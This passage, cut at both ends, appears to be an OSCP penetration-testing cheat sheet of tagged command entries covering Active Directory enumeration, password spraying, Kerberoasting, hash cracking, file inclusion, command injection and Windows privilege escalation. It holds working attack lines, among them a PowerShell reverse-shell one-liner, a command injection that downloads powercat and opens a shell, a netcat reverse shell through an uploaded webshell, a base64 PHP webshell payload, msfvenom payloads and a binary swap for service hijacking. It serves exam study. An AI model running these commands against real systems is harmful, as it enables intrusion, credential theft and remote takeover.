Convert-SidToName' lang: ps1 tags: oscp powershell windows PowerView desc: Converting all SIDs that have GenericAll permission on the Management Group - cmd: net group "Management Department" stephanie /add /domain lang: ps1 tags: oscp powershell windows desc: Using "net.exe" to add ourselves to domain group - cmd: Get-NetGroup "Management Department" | select member lang: ps1 tags: oscp powershell windows PowerView desc: Running "Get-NetGroup" to enumerate "Management Department" - cmd: net group "Management Department" stephanie /del /domain lang: ps1 tags: oscp powershell windows desc: Using "net.exe" to remove ourselves from domain group - cmd: Find-DomainShare lang: ps1 tags: oscp powershell windows PowerView desc: Domain Share Query - cmd: ls \\dc1.corp.com\sysvol\corp.com\ lang: ps1 tags: oscp powershell windows desc: Listing contents of the SYSVOL share - cmd: ls \\dc1.corp.com\sysvol\corp.com\Policies\ lang: ps1 tags: oscp powershell windows PowerView desc: Listing contents of the "SYSVOL\policies share" - cmd: gpp-decrypt "+bsY0V3d4/KgX3VJdO/vyepPfAN1zMFTiQDApgR92JE" lang: ps1 tags: oscp powershell windows PowerView desc: Using gpp-decrypt to decrypt the password GPP Group Policy Preferences - cmd: Get-Help Invoke-BloodHound lang: ps1 tags: oscp powershell windows BloodHound desc: Checking the SharpHound options - cmd: Invoke-BloodHound -CollectionMethod All -OutputDirectory C:\Users\stephanie\Desktop\ -OutputPrefix "corp audit" -prettyprint lang: ps1 tags: oscp powershell windows PowerView desc: Running SharpHound to collect domain data - cmd: sudo neo4j start lang: sh tags: oscp desc: Starting the Neo4j service in Kali Linux - cmd: bloodhound lang: ps1 tags: oscp sh desc: Starting BloodHound in Kali Linux - cmd: Find-InterestingDomainAcl -ResolveGUIDs lang: ps1 tags: oscp powershell windows PowerView desc: Search for interesting ACEs - cmd: Get-DomaiObjectAcl -Identity -ResolveGUIDs lang: ps1 tags: oscp powershell windows PowerView desc: Returns the ACLs associated with the specified account - cmd: Get-PathAcl -Path \\Path\Of\A\Share lang: ps1 tags: oscp powershell windows PowerView desc: Check the ACLs associated with a specified path (e.g smb share) - cmd: Invoke-UserHunter -CheckAccess lang: ps1 tags: oscp powershell windows PowerView desc: Get members from Domain Admins (default) and a list of computers and check if any of the users is logged - cmd: .\Spray-Passwords.ps1 -Pass Nexus123! -Admin lang: ps1 tags: oscp powershell windows PowerView desc: Using Spray-Passwords to attack user accounts - cmd: crackmapexec smb 192.168.50.75 -u users.txt -p 'Nexus123!' -d corp.com --continue-on-success lang: sh tags: oscp desc: Using crackmapexec to attack user accounts - cmd: crackmapexec smb 192.168.56.30 --users lang: sh tags: oscp desc: Using crackmapexec to enumerates user on DC - cmd: crackmapexec smb 192.168.50.75 -u dave -p 'Flowers1' -d corp.com lang: sh tags: oscp desc: Crackmapexec output indicating that the valid credentials have administrative privileges on the target - cmd: crackmapexec winrm 10.10.77.148 -u users -H ntml_hashs --continue-on-success lang: sh tags: oscp desc: Crackmapexec bruteforce winrm using ntmlm hash - cmd: .\kerbrute_windows_amd64.exe passwordspray -d corp.com .\usernames.txt "Nexus123!" lang: ps1 tags: oscp desc: Using kerbrute to attack user accounts - cmd: for i in 70 74 76 75 72 73; do crackmapexec smb 192.168.247.$i -u pete -p 'Nexus123!' -d corp.com;echo; done lang: sh tags: oscp desc: Spray the credentials of pete against all domain joined machines with crackmapexec - cmd: impacket-GetNPUsers -dc-ip 192.168.247.70 -request -outputfile hashes.asreproast corp.com/pete lang: sh tags: oscp desc: Using GetNPUsers to perform AS-REP roasting - cmd: impacket-GetNPUsers -dc-ip 192.168.56.30 -no-pass -usersfile users.txt minilab/ lang: sh tags: oscp desc: try asreproasting on all the users - cmd: sudo hashcat -m 18200 hashes.asreproast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force lang: sh tags: oscp desc: Cracking the AS-REP hash with Hashcat - cmd: .\Rubeus.exe asreproast /nowrap lang: ps1 tags: oscp powershell windows desc: Using Rubeus to obtain the AS-REP hash of dave - cmd: .\Rubeus.exe kerberoast /outfile:hashes.kerberoast lang: ps1 tags: oscp desc: Utilizing Rubeus to perform a Kerberoast attack (TGS-REP) - cmd: sudo hashcat -m 13100 hashes.kerberoast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force lang: sh tags: oscp desc: Cracking the TGS-REP hash - cmd: sudo impacket-GetUserSPNs -request -dc-ip 192.168.50.70 corp.com/pete lang: sh tags: oscp desc: Using impacket-GetUserSPNs to perform Kerberoasting on Linux (TGS-REP) - cmd: impacket-GetUserSPNs -request -dc-ip 192.168.56.30 mini.lab/carol:123456789 lang: sh tags: oscp desc: Using impacket-GetUserSPNs to perform Kerberoasting on Linux (TGS-REP) - cmd: sudo hashcat -m XXX ./hashs.file /usr/share/wordlists/rockyou.txt -j '$1' --force lang: sh tags: oscp desc: crack using rockyou and use a custom rule (here append 1 to password to match like secret1) - cmd: whois megacorpone.com -h 192.168.50.251 lang: sh tags: oscp desc: Using whois on megacorpone.com - cmd: whois 38.100.193.70 -h 192.168.50.251 lang: sh tags: oscp desc: Whois reverse lookup - cmd: host www.megacorpone.com lang: sh tags: oscp desc: Using host to find the A host record for - cmd: host -t mx megacorpone.com lang: sh tags: oscp desc: Using host to find the MX records for - cmd: host -t txt megacorpone.com lang: sh tags: oscp desc: Using host to find the TXT records for - cmd: host idontexist.megacorpone.com lang: sh tags: oscp desc: Using host to search for an invalid host - cmd: for ip in $(cat list.txt); do host $ip.megacorpone.com; done lang: sh tags: oscp desc: Using Bash to brute force forward DNS - cmd: for ip in $(seq 200 254); do host 51.222.169.$ip; done | grep -v "not found" lang: sh tags: oscp desc: Using Bash to brute force reverse DNS - cmd: dnsrecon -d megacorpone.com -t std lang: sh tags: oscp desc: Using dnsrecon to perform a standard - cmd: dnsrecon -d megacorpone.com -D ~/list.txt -t brt lang: sh tags: oscp desc: Brute forcing hostnames using dnsrecon - cmd: dnsenum megacorpone.com lang: sh tags: oscp desc: Using dnsenum to automate DNS enumeration - cmd: nslookup mail.megacorptwo.com lang: sh tags: oscp desc: Using nslookup to perform a simple host enumeration - cmd: nslookup -type=TXT info.megacorptwo.com 192.168.50.151 lang: sh tags: oscp desc: Using nslookup to perform a more specific query - cmd: nc -nvv -w 1 -z 192.168.50.152 3388-3390 lang: sh tags: oscp desc: Using netcat to perform a TCP port scan - cmd: nc -nv -u -z -w 1 192.168.50.149 120-123 lang: sh tags: oscp desc: Using Netcat to perform a UDP port scan - cmd: Test-NetConnection -Port 445 192.168.50.151 lang: ps1 tags: oscp desc: Port scanning SMB via PowerShell - cmd: 1..1024 | % {echo ((New-Object Net.Sockets.TcpClient).Connect("192.168.50.151", $_)) "TCP port $_ is open"} 2>$null lang: ps1 tags: oscp desc: Automating the PowerShell portscanning - cmd: sudo nbtscan -r 192.168.50.0/24 lang: sh tags: oscp desc: Using nbtscan to collect additional NetBIOS - cmd: net view \\dc01 /all lang: ps1 tags: oscp desc: Running 'net view' to list remote shares - cmd: Test-NetConnection -Port 25 192.168.50.8 lang: ps1 tags: oscp desc: Port scanning SMB via PowerShell - cmd: dism /online /Enable-Feature /FeatureName:TelnetClient lang: ps1 tags: oscp desc: Installing the Telnet client - cmd: telnet 192.168.50.8 25 lang: ps1 tags: oscp desc: Interacting with the SMTP service via Telnet on Windows - cmd: for ip in $(seq 1 254); do echo 192.168.50.$ip; done > ips ; onesixtyone -c community -i ips lang: sh tags: oscp desc: Using onesixtyone to brute force - cmd: snmpwalk -c public -v1 -t 10 192.168.50.151 lang: sh tags: oscp desc: Using snmpwalk to enumerate the entire MIB - cmd: snmpwalk -c public -v1 192.168.50.151 1.3.6.1.4.1.77.1.2.25 lang: sh tags: oscp desc: Using snmpwalk to enumerate Windows users - cmd: snmpwalk -c public -v1 192.168.50.151 1.3.6.1.2.1.25.4.2.1.2 lang: sh tags: oscp desc: Using snmpwalk to enumerate Windows - cmd: snmpwalk -c public -v1 192.168.50.151 1.3.6.1.2.1.25.6.3.1.2 lang: sh tags: oscp desc: Using snmpwalk to enumerate - cmd: snmpwalk -c public -v1 192.168.50.151 1.3.6.1.2.1.6.13.1.3 lang: sh tags: oscp desc: Using snmpwalk to enumerate open TCP ports - cmd: gobuster dir -u 192.168.50.20 -w /usr/share/wordlists/dirb/common.txt -t 5 lang: sh tags: oscp desc: Running Gobuster - cmd: cat /etc/hosts lang: sh tags: oscp desc: Setting up our /etc/hosts file for offsecwp - cmd: cat /usr/share/wordlists/rockyou.txt | head lang: sh tags: oscp desc: Copying the first 10 rockyou wordlist values - cmd: curl https://www.google.com/robots.txt lang: sh tags: oscp desc: https://www.google.com/robots.txt - cmd: gobuster dir -u http://192.168.50.16:5002 -w /usr/share/wordlists/dirb/big.txt -p pattern lang: sh tags: oscp desc: Bruteforcing API Paths - cmd: curl -i http://192.168.50.16:5002/users/v1 lang: sh tags: oscp desc: Obtaining Users' Information - cmd: gobuster dir -u http://192.168.50.16:5002/users/v1/admin/ -w /usr/share/wordlists/dirb/small.txt lang: sh tags: oscp desc: Discovering extra APIs - cmd: curl -i http://192.168.50.16:5002/users/v1/admin/password lang: sh tags: oscp desc: Discovering API unsupported methods - cmd: curl -i http://192.168.50.16:5002/users/v1/login lang: sh tags: oscp desc: Inspecting the login API - cmd: curl -i http://offsecwp --user-agent "" --proxy 127.0.0.1:8080 lang: sh tags: oscp desc: Launching the Final XSS Attack through Curl - cmd: pwd ; ls / ; cat /etc/passwd lang: sh tags: oscp desc: Display content of /etc/passwd with an absolute path - cmd: curl http://mountaindesserts.com/meteor/index.php?page=../../../../../../../../../home/offsec/.ssh/id_rsa lang: sh tags: oscp desc: SSH Private Key via curl - cmd: ssh -i dt_key -p 2222 offsec@mountaindesserts.com ; yes ; chmod 400 dt_key ; ssh -i dt_key -p 2222 offsec@mountaindesserts.com lang: sh tags: oscp desc: Using the Private Key to connect via SSH - cmd: curl http://192.168.50.16/cgi-bin/../../../../etc/passwd ; curl http://192.168.50.16/cgi-bin/../../../../../../../../../../etc/passwd lang: sh tags: oscp desc: Using "../" to leverage the Directory Traversal vulnerability in Apache 2.4.49 - cmd: curl http://192.168.50.16/cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd lang: sh tags: oscp desc: Using encoded dots for Directory Traversal - cmd: curl http://mountaindesserts.com/meteor/index.php?page=../../../../../../../../../var/log/apache2/access.log lang: sh tags: oscp desc: Log entry of Apache's access.log - cmd: curl http://mountaindesserts.com/meteor/index.php?page=admin.php lang: sh tags: oscp desc: Contents of the admin.php file - cmd: curl http://mountaindesserts.com/meteor/index.php?page=php://filter/resource=admin.php lang: sh tags: oscp desc: Usage of "php://filter" to include unencoded admin.php - cmd: curl http://mountaindesserts.com/meteor/index.php?page=php://filter/convert.base64-encode/resource=admin.php lang: sh tags: oscp desc: Usage of "php://filter" to include base64 encoded admin.php - cmd: echo "PCFET0NUWVBFIGh0bWw+CjxodG1sIGxhbmc9ImVuIj4KPGhlYWQ+CiAgICA8bWV0YSBjaGFyc2V0PSJVVEYtOCI+CiAgICA8bWV0YSBuYW1lPSJ2aWV3cG9ydCIgY29udGVudD0id2lkdGg9ZGV2aWNlLXdpZHRoLCBpbml0aWFsLXNjYWxlPTEuMCI+CiAgICA8dGl0bGU+TWFpbnRlbmFuY2U8L3RpdGxlPgo8L2hlYWQ+Cjxib2R5PgogICAgICAgIDw/cGhwIGVjaG8gJzxzcGFuIHN0eWxlPSJjb2xvcjojRjAwO3RleHQtYWxpZ246Y2VudGVyOyI+VGhlIGFkbWluIHBhZ2UgaXMgY3VycmVudGx5IHVuZGVyIG1haW50ZW5hbmNlLic7ID8+Cgo8P3BocAokc2VydmVybmFtZSA9ICJsb2NhbGhvc3QiOwokdXNlcm5hbWUgPSAicm9vdCI7CiRwYXNzd29yZCA9ICJNMDBuSzRrZUNhcmQhMiMiOwoKLy8gQ3JlYXRlIGNvbm5lY3Rpb24KJGNvbm4gPSBuZXcgbXlzcWxpKCRzZXJ2ZXJuYW1lLCAkdXNlcm5hbWUsICRwYXNzd29yZCk7CgovLyBDaGVjayBjb25uZWN0aW9uCmlmICgkY29ubi0+Y29ubmVjdF9lcnJvcikgewogIGRpZSgiQ29ubmVjdGlvbiBmYWlsZWQ6ICIgLiAkY29ubi0+Y29ubmVjdF9lcnJvcik7Cn0KZWNobyAiQ29ubmVjdGVkIHN1Y2Nlc3NmdWxseSI7Cj8+Cgo8L2JvZHk+CjwvaHRtbD4K" | base64 -d lang: sh tags: oscp desc: Decoding the base64 encoded content of admin.php - cmd: curl "http://mountaindesserts.com/meteor/index.php?page=data://text/plain," lang: sh tags: oscp desc: Usage of the "data://" wrapper to execute ls - cmd: echo -n '' | base64 ; curl "http://mountaindesserts.com/meteor/index.php?page=data://text/plain;base64,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbImNtZCJdKTs/Pg==&cmd=ls" lang: sh tags: oscp desc: Usage of the "data://" wrapper with base64 encoded data - cmd: curl "http://mountaindesserts.com/meteor/index.php?page=http://192.168.119.3/simple-backdoor.php&cmd=ls" lang: sh tags: oscp desc: Exploiting RFI with a PHP backdoor and execution of ls - cmd: curl http://192.168.50.189/meteor/uploads/simple-backdoor.pHP?cmd=dir lang: sh tags: oscp desc: Execution of dir command in the uploaded webshell - cmd: pwsh ; $Text = '$client = New-Object System.Net.Sockets.TCPClient("192.168.119.3",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' ; $Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text) ; $EncodedText =[Convert]::ToBase64String($Bytes) ; $EncodedText ; exit lang: ps1 tags: oscp desc: Encoding the oneliner in PowerShell on Linux - cmd: ls -la /usr/share/webshells lang: sh tags: oscp desc: Listing of the webshells directory on Kali - cmd: curl http://mountaindesserts.com:8000/index.php ; curl http://mountaindesserts.com:8000/meteor/index.php ; curl http://mountaindesserts.com:8000/admin.php lang: sh tags: oscp desc: Failed attempts to access PHP files - cmd: ssh-keygen ; fileup ; cat fileup.pub > authorized_keys lang: sh tags: oscp desc: Prepare authorized_keys file for File Upload - cmd: ssh -o PubkeyAcceptedAlgorithms=ssh-rsa -o HostKeyAlgorithms=ssh-rsa user@192.168.195.245 lang: sh tags: oscp desc: connect on old SSH server - cmd: rm ~/.ssh/known_hosts ; ssh -p 2222 -i fileup root@mountaindesserts.com ; yes lang: sh tags: oscp desc: Using the SSH key to successufully connect via SSH as the root user - cmd: curl -X POST --data 'Archive=ipconfig' http://192.168.50.189:8000/archive lang: sh tags: oscp desc: Detected Command Injection for ipconfig - cmd: curl -X POST --data 'Archive=git' http://192.168.50.189:8000/archive lang: sh tags: oscp desc: Entering git as command - cmd: curl -X POST --data 'Archive=git version' http://192.168.50.189:8000/archive lang: sh tags: oscp desc: Using git version to detect the operating system - cmd: curl -X POST --data 'Archive=git%3Bipconfig' http://192.168.50.189:8000/archive lang: sh tags: oscp desc: Entering git and ipconfig with encoded semicolon - cmd: curl -X POST --data 'Archive=git%3B(dir%202%3E%261%20*%60%7Cecho%20CMD)%3B%26%3C%23%20rem%20%23%3Eecho%20PowerShell' http://192.168.50.189:8000/archive lang: sh tags: oscp desc: Determining where the injected commands are executed - cmd: curl -X POST --data 'Archive=git%3BIEX%20(New-Object%20System.Net.Webclient).DownloadString(%22http%3A%2F%2F192.168.119.3%2Fpowercat.ps1%22)%3Bpowercat%20-c%20192.168.119.3%20-p%204444%20-e%20powershell' http://192.168.50.189:8000/archive lang: sh tags: oscp desc: Downloading Powercat and creating a reverse shell via Command Injection - cmd: mysql -u root -p'root' -h 192.168.50.16 -P 3306 lang: sh tags: oscp desc: Connecting to the remote MySQL instance - cmd: impacket-mssqlclient Administrator:Lab123@192.168.50.18 -windows-auth lang: sh tags: oscp desc: Connecting to the Remote MSSQL instance via Impacket - cmd: impacket-mssqlclient Administrator:Lab123@192.168.50.18 -windows-auth ; EXECUTE sp_configure 'show advanced options', 1; ; RECONFIGURE; ; EXECUTE sp_configure 'xp_cmdshell', 1; ; RECONFIGURE; lang: sh tags: oscp desc: Enabling xp_cmdshell feature - cmd: sqlmap -u http://192.168.50.19/blindsqli.php?user=1 -p user lang: sh tags: oscp desc: Running sqlmap to quickly find SQL injection points - cmd: sqlmap -u http://192.168.50.19/blindsqli.php?user=1 -p user --dump lang: sh tags: oscp desc: Running sqlmap to Dump Users Credentials Table - cmd: sqlmap -r post.txt -p item --os-shell --web-root "/var/www/html/tmp" lang: sh tags: oscp desc: Running sqlmap with osshell - cmd: pip3 install wsgidav lang: sh tags: oscp desc: Installing pip3 and WsgiDAV - cmd: wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root /home/kali/webdav/ lang: sh tags: oscp desc: Starting WsgiDAV on port 80 - cmd: firefox --search "Microsoft Edge site:exploit-db.com" lang: sh tags: oscp desc: Using Google to search for - cmd: sudo apt update && sudo apt install exploitdb lang: sh tags: oscp desc: Updating the exploitdb package from the - cmd: ls -1 /usr/share/exploitdb/ lang: sh tags: oscp desc: Listing the two major sections in the archive - cmd: ls -1 /usr/share/exploitdb/exploits lang: sh tags: oscp desc: Listing the content of the exploits - cmd: searchsploit lang: sh tags: oscp desc: The searchsploit command syntax - cmd: searchsploit remote smb microsoft windows lang: sh tags: oscp desc: Using searchsploit to list available - cmd: searchsploit -m windows/remote/48537.py ; searchsploit -m 42031 lang: sh tags: oscp desc: The exploits are copied the - cmd: searchsploit -m 50944 lang: sh tags: oscp desc: The exploit is copied into our current working directory - cmd: python3 50944.py -url http://192.168.50.11/project/ -u george@AIDevCorp.org -p AIDevCorp lang: sh tags: oscp desc: The exploit completed successfully with an uploaded file - cmd: curl http://192.168.50.11/project/uploads/users/420919-backdoor.php?cmd=whoami lang: sh tags: oscp desc: The PHP script was executed by the wwwdata system account - cmd: curl http://192.168.50.11/project/uploads/users/420919-backdoor.php --data-urlencode "cmd=which nc" lang: sh tags: oscp desc: nc is installed on the target - cmd: curl http://192.168.50.11/project/uploads/users/420919-backdoor.php --data-urlencode "cmd=nc -nv 192.168.50.129 6666 -e /bin/bash" lang: sh tags: oscp desc: The reverse netcat shell is executed and the terminal session does not respond - cmd: searchsploit "Sync Breeze Enterprise 10.0.28" lang: sh tags: oscp desc: Searching for available - cmd: searchsploit -m 42341 lang: sh tags: oscp desc: Using searchsploit to copy - cmd: sudo apt install mingw-w64 lang: sh tags: oscp desc: Installing the mingww64 crosscompiler in Kali - cmd: i686-w64-mingw32-gcc 42341.c -o syncbreeze_exploit.exe lang: sh tags: oscp desc: Errors displayed after attempting - cmd: msfvenom -p windows/shell_reverse_tcp LHOST=192.168.50.4 LPORT=443 EXITFUNC=thread -f c –e x86/shikata_ga_nai -b "\x00\x0a\x0d\x25\x26\x2b\x3d" lang: sh tags: oscp desc: Using msfvenom to generate a - cmd: sudo wine syncbreeze_exploit.exe lang: sh tags: oscp desc: Running the Windows exploit using - cmd: i686-w64-mingw32-gcc 42341.c -o syncbreeze_exploit.exe -lws2_32 lang: sh tags: oscp desc: Compiling the exploit and setting up - cmd: wine syncbreeze_exploit.exe lang: sh tags: oscp desc: Running the final version of the - cmd: curl -k https://192.168.50.45/uploads/shell.php?cmd=whoami lang: sh tags: oscp desc: Verifying if our exploit was - cmd: xxd -b malware.txt lang: sh tags: oscp desc: Inspecting the binary file content with xxd - cmd: msfvenom -p windows/shell_reverse_tcp LHOST=192.168.50.1 LPORT=443 -f exe > binary.exe lang: sh tags: oscp desc: Generating a malicious PE - cmd: msfvenom -p windows/shell_reverse_tcp LHOST=192.168.50.1 LPORT=443 -f powershell -v sc lang: sh tags: oscp desc: Generating a PowerShell compatible - cmd: .\bypass.ps1 lang: ps1 tags: oscp desc: Attempting to run the script - cmd: Get-ExecutionPolicy -Scope CurrentUser ; Set-ExecutionPolicy -ExecutionPolicy Unrestricted -Scope CurrentUser ; A ; Get-ExecutionPolicy -Scope CurrentUser lang: ps1 tags: oscp desc: Changing the ExecutionPolicy for our - cmd: apt-cache search shellter ; sudo apt install shellter lang: sh tags: oscp desc: Installing shellter in Kali Linux - cmd: sudo apt install wine lang: sh tags: oscp desc: Installing wine in Kali Linux - cmd: msfconsole -x "use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp;set LHOST 192.168.50.1;set LPORT 443;run;" lang: sh tags: oscp desc: Setting up a handler for the meterpreter payload - cmd: cd /usr/share/wordlists/ ; ls ; sudo gzip -d rockyou.txt.gz ; hydra -l george -P /usr/share/wordlists/rockyou.txt -s 2222 ssh://192.168.50.201 lang: sh tags: oscp desc: Unzipping Gzip Archive and attacking SSH - cmd: hydra -L /usr/share/wordlists/dirb/others/names.txt -p "SuperS3cure1337#" rdp://192.168.50.202 lang: sh tags: oscp desc: Spraying a password on RDP service - cmd: hydra -l user -P /usr/share/wordlists/rockyou.txt 192.168.50.201 http-post-form "/index.php:fm_usr=user&fm_pwd=^PASS^:Login failed. Invalid" lang: sh tags: oscp desc: Successful Dictionary Attack on the Login Form - cmd: echo -n "secret" | sha256sum ; echo -n "secret" | sha256sum ; echo -n "secret1" | sha256sum lang: sh tags: oscp desc: Comparing resulting hash values for secret and secret1 - cmd: echo -n "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789" | wc -c ; python3 -c "print(62**5)" lang: sh tags: oscp desc: Calculating the keyspace for a password of length 5 - cmd: hashcat -b lang: sh tags: oscp desc: Benchmark CPU with MD5, SHA1, and SHA2256 - cmd: python3 -c "print(916132832 / 134200000)" ; python3 -c "print(916132832 / 9276300000)" lang: sh tags: oscp desc: Calculating the cracking time for password length of 5 - cmd: hashcat -m 0 crackme.txt /usr/share/wordlists/rockyou.txt -r demo3.rule --force lang: sh tags: oscp desc: Cracking a MD5 Hash with Hashcat and a mutated rockyou.txt wordlist - cmd: ls -la /usr/share/hashcat/rules/ lang: sh tags: oscp desc: Listing of Hashcat's rule files - cmd: ls -la Database.kdbx ; keepass2john Database.kdbx > keepass.hash ; cat keepass.hash lang: sh tags: oscp desc: Using keepass2john to format the KeePass database for Hashcat - cmd: cat keepass.hash lang: sh tags: oscp desc: Correct hash format for Hashcat without "Database:" - cmd: hashcat --help | grep -i "KeePass" lang: sh tags: oscp desc: Finding the mode of KeePass in Hashcat - cmd: hashcat -m 13400 keepass.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/rockyou-30000.rule --force lang: sh tags: oscp desc: Cracking the KeePass database hash - cmd: chmod 600 id_rsa ; ssh -i id_rsa -p 2222 dave@192.168.50.201 ; yes ; ssh -i id_rsa -p 2222 dave@192.168.50.201 lang: sh tags: oscp desc: SSH connection attempts with the private key - cmd: ssh2john id_rsa > ssh.hash ; cat ssh.hash lang: sh tags: oscp desc: Using ssh2john to format the hash - cmd: hashcat -h | grep -i "ssh" lang: sh tags: oscp desc: Determine the correct mode for Hashcat - cmd: hashcat -m 22921 ssh.hash ssh.passwords -r ssh.rule --force lang: sh tags: oscp desc: Failed cracking attempt with Hashcat - cmd: cat ssh.rule ; sudo sh -c 'cat /home/kali/passwordattacks/ssh.rule >> /etc/john/john.conf' lang: sh tags: oscp desc: Adding the named rules to the JtR configuration file - cmd: john --wordlist=ssh.passwords --rules=sshRules ssh.hash lang: sh tags: oscp desc: Cracking the hash with JtR - cmd: ssh -i id_rsa -p 2222 dave@192.168.50.201 lang: sh tags: oscp desc: Entering Passphrase to connect to the target system with SSH - cmd: Get-LocalUser lang: ps1 tags: oscp desc: Showing all local users in PowerShell - cmd: hashcat --help | grep -i "ntlm" lang: sh tags: oscp desc: Hashcat mode for NTLM hashes - cmd: hashcat -m 1000 nelly.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force lang: sh tags: oscp desc: NTLM hash of user nelly in nelly.hash and Hashcat mode - cmd: impacket-psexec -hashes 00000000000000000000000000000000:7a38310ea6f0027ee955abed1762964b Administrator@192.168.50.212 lang: sh tags: oscp desc: NTLM hash of user nelly in nelly.hash and Hashcat mode - cmd: impacket-psexec relia.com/maildmz:DPuBT9tGCBrTbR@192.168.244.189 lang: sh tags: oscp desc: Using psexec to get an interactive shell - cmd: impacket-wmiexec -hashes 00000000000000000000000000000000:7a38310ea6f0027ee955abed1762964b Administrator@192.168.50.212 lang: sh tags: oscp desc: Using wmiexec to get an interactive shell - cmd: ip a ; sudo responder -I tap0 lang: ps1 tags: oscp desc: Starting Responder on interface tap0 - cmd: dir \\192.168.119.2\test lang: ps1 tags: oscp desc: Using the dir command to create an SMB connection to our Kali machine - cmd: cat paul.hash ; hashcat --help | grep -i "ntlm" lang: sh tags: oscp desc: Contents of paul.hash and Hashcat mode - cmd: hashcat -m 5600 paul.hash /usr/share/wordlists/rockyou.txt --force lang: sh tags: oscp desc: Cracking the NetNTLMv2 hash of paul - cmd: sudo impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.50.212 -c "powershell -enc JABjAGwAaQBlAG4AdA..." lang: sh tags: oscp desc: Starting ntlmrelayx for a Relayattack targeting FILES02 - cmd: dir \\192.168.119.2\test lang: sh tags: oscp desc: Using the dir command to create an SMB connection to our Kali machine - cmd: powershell ; Get-LocalUser lang: ps1 tags: oscp desc: Display local users on CLIENT220 - cmd: Get-LocalGroup lang: ps1 tags: oscp desc: Display local groups on CLIENTWK220 - cmd: Get-LocalGroupMember adminteam ; Get-LocalGroupMember Administrators lang: ps1 tags: oscp desc: Display members of the group adminteam - cmd: systeminfo lang: ps1 tags: oscp desc: Information about the operating system and architecture - cmd: ipconfig /all lang: ps1 tags: oscp desc: Information about the network configuration - cmd: route print lang: ps1 tags: oscp desc: Routing table on CLIENTWK220 - cmd: netstat -ano lang: ps1 tags: oscp desc: Active network connections on CLIENTWK220 - cmd: Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname ; Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname lang: ps1 tags: oscp desc: Installed applications on CLIENTWK220 - cmd: Get-Process lang: ps1 tags: oscp desc: Running processes on CLIENTWK220 - cmd: Get-ChildItem -Path C:\xampp -Include *.txt,*.ini -File -Recurse -ErrorAction SilentlyContinue lang: ps1 tags: oscp desc: Searching for sensitive information in XAMPP directory - cmd: type C:\xampp\passwords.txt ; type C:\xampp\mysql\bin\my.ini lang: ps1 tags: oscp desc: Review the contents of passwords.txt and my.ini - cmd: Get-ChildItem -Path C:\Users\dave\ -Include *.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx -File -Recurse -ErrorAction SilentlyContinue lang: ps1 tags: oscp desc: Searching for text files and password manager databases in the home directory of dave - cmd: cat Desktop\asdf.txt lang: ps1 tags: oscp desc: Contents of asdf.txt - cmd: net user steve lang: ps1 tags: oscp desc: Local groups user steve is a member of - cmd: type C:\xampp\mysql\bin\my.ini lang: ps1 tags: oscp desc: Contents of the my.ini file - cmd: net user backupadmin lang: ps1 tags: oscp desc: Local groups backupadmin is a member of - cmd: runas /user:backupadmin cmd lang: ps1 tags: oscp desc: Using Runas to execute cmd as user backupadmin - cmd: Get-History lang: ps1 tags: oscp desc: Empty result from GetHistory - cmd: (Get-PSReadlineOption).HistorySavePath lang: ps1 tags: oscp desc: Display path of the history file from PSReadline - cmd: type C:\Users\dave\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt lang: ps1 tags: oscp desc: Empty result from GetHistory - cmd: type C:\Users\Public\Transcripts\transcript01.txt lang: ps1 tags: oscp desc: Contents of the transcript file - cmd: $password = ConvertTo-SecureString "qwertqwertqwert123!!" -AsPlainText -Force ; $cred = New-Object System.Management.Automation.PSCredential("daveadmin", $password) ; Enter-PSSession -ComputerName CLIENTWK220 -Credential $cred lang: ps1 tags: oscp desc: Using the commands from the transcript file to obtain a PowerShell session as daveadmin - cmd: evil-winrm -i 192.168.50.220 -u daveadmin -p "qwertqwertqwert123\!\!" lang: ps1 tags: oscp desc: Using evilwinrm to connect to CLIENTWK220 as daveadmin - cmd: icacls "C:\xampp\apache\bin\httpd.exe" lang: ps1 tags: oscp desc: Permissions of _httpd.exe_ - cmd: x86_64-w64-mingw32-gcc adduser.c -o adduser.exe lang: sh tags: oscp desc: CrossCompile the C Code to a 64bit application - cmd: iwr -uri http://192.168.119.3/adduser.exe -Outfile adduser.exe ; move C:\xampp\mysql\bin\mysqld.exe mysqld.exe ; move .\adduser.exe C:\xampp\mysql\bin\mysqld.exe lang: ps1 tags: oscp desc: Replacing mysqld.exe with our malicious binary - cmd: net stop mysql lang: ps1 tags: oscp desc: Attempting to stop the service in order to restart it - cmd: Get-CimInstance -ClassName win32_service | Select Name, StartMode | Where-Object {$_.Name -like 'mysql'} lang: ps1 tags: oscp desc: Obtain Startup Type for mysql service - cmd: whoami /priv lang: ps1 tags: oscp desc: Checking for reboot privileges - cmd: shutdown /r /t 0 lang: ps1 tags: oscp desc: Rebooting the machine - cmd: Get-LocalGroupMember administrators lang: ps1 tags: oscp desc: Display members of the local administrators group - cmd: iwr -uri http://192.168.119.3/PowerUp.ps1 -Outfile PowerUp.ps1 ; powershell -ep bypass ; . .\PowerUp.ps1 ; Get-ModifiableServiceFile lang: ps1 tags: oscp desc: Import PowerUp.ps1 and execute GetModifiableServiceFile - cmd: Install-ServiceBinary -Name 'mysql' lang: ps1 tags: oscp desc: Error from AbuseFunction - cmd: $ModifiableFiles = echo 